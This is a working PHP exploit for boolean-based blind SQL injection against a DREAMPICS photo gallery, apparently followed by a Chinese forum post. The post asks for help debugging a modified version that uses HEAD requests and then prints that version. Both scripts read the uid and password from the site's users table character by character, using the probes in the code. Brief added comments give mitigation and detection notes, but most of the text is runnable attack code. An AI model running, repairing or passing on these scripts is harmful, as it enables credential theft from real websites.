// Boolean-based blind SQL injection proof-of-concept against the gallery named in the
// banner below. The target URL is taken verbatim from the command line ($argv[1]) and
// SQL fragments are appended to its last query parameter, so the vulnerable page is
// presumably concatenating that parameter into a query unescaped. Defender's notes:
//  - Mitigation: bind the id parameter in a prepared statement (or cast it to int on
//    the server) so nothing appended to it can alter the query.
//  - Detection: every probe carries `+and+1=1--`, `+and+1=0--` or `ascii(substring(`
//    in the query string, and one client issues hundreds of them in a burst; both are
//    straightforward access-log / WAF signatures.
ini_set("max_execution_time",0); // lift PHP's default script timeout: the probe loops below are slow
print_r('
##############################################################################
#
# DREAMPICS Photo/Video Gallery Blind SQL Injection Exploit
#
# ---->>>> xoron <<<<<-----
# [email protected]
# XORON (c) 2009
#
# WARNING!: php xoron.php "http://www.xoronk1ng./[PATH]/index.php?fuseaction=gallery.viewPhotos&exhibition_id=13"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
// $r and $w are the response lengths for an always-true and an always-false condition;
// $t is the percentage gap between them and is reused as the threshold below.
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));echo "\nPassword: ";
// Every iteration of the inner loop is one or two further HTTP requests to the target
// (no error handling: a failed file_get_contents() yields length 0 and is treated as data).
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
因为上面这个脚本要执行上百次,效率非常低,速度太慢,我叫人改了一下,但是改完之后,得出的密码都变成了“---------------------”,很奇怪,谁能帮忙看一下?下面是修改过之后的代码。<?php
// get_remote_file_siz(string $remoteFile): issues a HEAD request (CURLOPT_NOBODY) for
// $remoteFile, following redirects, and returns the value parsed from the response's
// Content-Length header. On a transport-level cURL failure it prints 'cURL failed' and
// exits the whole process instead of returning to the caller.
function get_remote_file_siz($remoteFile)
{
$ch = curl_init($remoteFile);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); //not necessary unless the file redirects (like the PHP example we're using here)
$data = curl_exec($ch);
curl_close($ch);
if ($data === false) {
echo 'cURL failed';
exit;
} $contentLength = 'unknown';
$status = 'unknown';
// $status is parsed from the status line but never used by this function.
if (preg_match('/^HTTP\/1\.[01] (\d\d\d)/', $data, $matches)) {
$status = (int)$matches[1];
}
if (preg_match('/Content-Length: (\d+)/', $data, $matches)) {
$contentLength = (int)$matches[1];
}
return $contentLength;
}ini_set("max_execution_time",0); // lift PHP's default script timeout: the probe loops below are slow
print_r('
##############################################################################
#
#123
#
#
# : Usage :
#php file.php "http://site/123.php?fid=11"
#
#
##############################################################################
');
// Same boolean-based blind SQL injection probe as the script above, with the response
// size now taken from a HEAD request's Content-Length instead of the fetched body.
// Defender's notes: the server-side fix is to bind `fid` as an integer parameter in a
// prepared statement; for detection, look for `+and+1=1--`, `+and+1=0--` and
// `ascii(substring(` in query strings, and for a burst of HEAD requests from one client.
if ($argc > 1) {
$url = $argv[1];
// max(1, ...) keeps the divisor used in every later percentage non-zero.
$r = max(1,get_remote_file_siz($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = get_remote_file_siz($url."+and+1=0--");
$t = abs((100-($w/$r*100)));
echo "id: ";
// $count is only assigned inside the loop; it stays undefined if no probe crosses the threshold.
for ($i=1; $i <= 30; $i++) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$i.",1))!=0--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>